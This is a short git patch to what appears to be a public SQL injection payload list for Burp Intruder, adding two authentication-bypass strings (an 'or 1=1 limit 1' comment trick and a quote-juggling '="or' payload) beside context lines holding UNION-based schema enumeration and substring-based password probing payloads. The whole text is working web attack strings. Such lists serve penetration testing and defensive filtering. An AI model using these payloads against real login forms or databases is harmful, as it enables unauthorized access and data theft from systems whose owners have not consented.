From a4411ae086c9b0efb8898ff2d9107d21f198a9dd Mon Sep 17 00:00:00 2001 From: Elon Salfati Date: Fri, 28 Jun 2019 18:16:45 +0300 Subject: [PATCH] Added 2 working sql injection lines --- SQL Injection/Intruder/Auth_Bypass2.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/SQL Injection/Intruder/Auth_Bypass2.txt b/SQL Injection/Intruder/Auth_Bypass2.txt index c909cd2..3881b4c 100644 --- a/SQL Injection/Intruder/Auth_Bypass2.txt +++ b/SQL Injection/Intruder/Auth_Bypass2.txt @@ -117,4 +117,5 @@ ' UNION select table_schema,table_name FROM information_Schema.tables;# admin' and substring(password/text(),1,1)='7 ' and substring(password/text(),1,1)='7 - +' or 1=1 limit 1 -- -+ +'="or'